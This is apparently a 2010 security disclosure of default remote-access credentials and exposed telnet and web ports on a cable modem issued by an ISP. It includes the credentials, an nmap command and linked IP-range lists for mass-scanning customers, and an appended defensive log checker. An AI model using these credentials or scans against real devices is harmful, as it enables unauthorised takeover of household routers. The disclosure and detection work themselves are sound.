
RoadRunner Cablemodem Remote Root

12 Aug 2010. Reported by Harry Strongburg. Type: packetstorm. Source: packetstormsecurity.com

RoadRunner Cablemodem Remote Root exploit on Ambit U10C019 CableModem. Default login credentials allow remote access on specific ports. Firmware update may have patched the vulnerability.

Code
`Hello. This is the introduction to a large-scale RoadRunner Cable-Router exploit on the Ambit U10C019 CableModem.  
  
Basically, the default Cable Router that RoadRunner/TimeWarner gives to its customers:  
1) Allows for remote login with user: admin, password: cableroot.  
2) Allows remote access by default. (port 64623 for telnet, port 64680 for webui)  
  
Devices affected:  
Ambit U10C019 CableModem  
Boot code revision : 2.1.6d  
Hardware revision : 4.10  
Software revision : 5.66.1026  
Software build time : Feb 26 2009 12:53:26  
  
  
Example for scanning the RoadRunner IP ranges:  
nmap -PN -T5 --open -p64623 -n -P0 --max-retries 0 --host-timeout 5s -iL rr.lst >> nmap.log; cat nmap.log | grep -B 3 open > open.log  
  
Torrent of files related to this disclosure at https://thepiratebay.org/torrent/5753559/  
This archive contains:  
rr.lst - list of RoadRunner CIDR blocks.  
open-cleaned.txt - my initial scan of the ranges to see a rough estimate of number of affected devices.  
readme.txt - this file.  
(You can also DDL it at http://harry.lu/files/torrents/rr-ambit-fd.tar.gz; I prefer you use the torrent option to save my bandwidth).  
  
  
This hole appears to have been patched with a firmware update:  
  
$ telnet device.ip 64623  
Trying device.ip...  
Connected to device.ip.  
Escape character is '^]'.  
Connection closed by foreign host.  
  
$ curl -vvv device.ip:64680  
* About to connect() to device.ip port 64680 (#0)  
* Trying device.ip... connected  
* Connected to device.ip (device.ip) port 64680 (#0)  
> GET / HTTP/1.1  
> User-Agent: curl/7.21.0 (x86_64-unknown-linux-gnu) libcurl/7.21.0 OpenSSL/1.0.0a zlib/1.2.5  
> Host: device.ip:64680  
> Accept: */*  
>   
* Empty reply from server  
* Connection #0 to host device.ip left intact  
curl: (52) Empty reply from server  
* Closing connection #0  
  
  
I use the phrase "appears", as I am unsure. Michael O'Donnel at Road Runner, who is the Chief of Security (if I recall correctly), said he would work   
on it. Later, I did not receive much more contact after the *8 weeks of time* after I contacted them. Recent attempts to contact Michael via leaving   
a voicemail got no reply. (Maybe I shouldn't have been so polite in my disclosure to them, if they don't even bother to contact me when it's fixed?)  
  
  
  
Keep safe.  
--  
Harry Strongburg <harry.fd at harry.lu>  
  
`
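
A defender-side check for the exposure described above, as an added example that is not part of the original advisory: it reads gateway firewall logs and reports connections from outside the LAN to the two remote-management ports (64623 telnet, 64680 web UI). The log lines are constructed, abbreviated netfilter LOG-style samples; the `FWD-ACCEPT`/`FWD-DROP` prefixes, the interface names and the `192.168.0.0/24` LAN range are assumptions.

```python
import re
from collections import defaultdict
from ipaddress import ip_address, ip_network

# Remote-management ports named in the advisory.
MGMT_PORTS = {64623: "telnet", 64680: "webui"}
# Assumption: the local network behind the modem.
LAN = ip_network("192.168.0.0/24")

# Constructed sample lines (abbreviated netfilter LOG style, not captured traffic).
SAMPLE_LOG = """\
Aug 12 10:01:02 gw kernel: FWD-ACCEPT IN=wan0 OUT=lan0 SRC=203.0.113.7 DST=192.168.0.1 PROTO=TCP SPT=51514 DPT=64623 SYN
Aug 12 10:01:03 gw kernel: FWD-ACCEPT IN=wan0 OUT=lan0 SRC=203.0.113.7 DST=192.168.0.1 PROTO=TCP SPT=51520 DPT=64680 SYN
Aug 12 10:02:10 gw kernel: FWD-DROP IN=wan0 OUT=lan0 SRC=198.51.100.9 DST=192.168.0.1 PROTO=TCP SPT=40000 DPT=64623 SYN
Aug 12 10:03:00 gw kernel: FWD-ACCEPT IN=lan0 OUT=wan0 SRC=192.168.0.20 DST=192.0.2.50 PROTO=TCP SPT=64623 DPT=443 SYN
Aug 12 10:04:00 gw kernel: FWD-ACCEPT IN=lan0 OUT=lan0 SRC=192.168.0.30 DST=192.168.0.1 PROTO=TCP SPT=50000 DPT=64680 SYN
"""

LINE_RE = re.compile(
    r"(?P<action>FWD-(?:ACCEPT|DROP)) .*?SRC=(?P<src>\S+) DST=(?P<dst>\S+) "
    r"PROTO=TCP .*?DPT=(?P<dpt>\d+)"
)


def find_mgmt_exposure(log_text):
    """Map each non-LAN source to its hits on the management ports."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue
        port = int(m["dpt"])
        # Match on destination port only; a source port of 64623 is unrelated.
        if port in MGMT_PORTS and ip_address(m["src"]) not in LAN:
            hits[m["src"]].append((MGMT_PORTS[port], m["dst"], m["action"]))
    return dict(hits)


def accepted_sources(hits):
    """Sources with at least one connection the firewall let through."""
    return sorted(s for s, evs in hits.items()
                  if any(action == "FWD-ACCEPT" for _, _, action in evs))


if __name__ == "__main__":
    found = find_mgmt_exposure(SAMPLE_LOG)
    for src in accepted_sources(found):
        print(src, "reached", sorted({svc for svc, _, _ in found[src]}))
```

Any source returned by `accepted_sources` reached a management port from outside, which on unpatched firmware means the default login was reachable.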
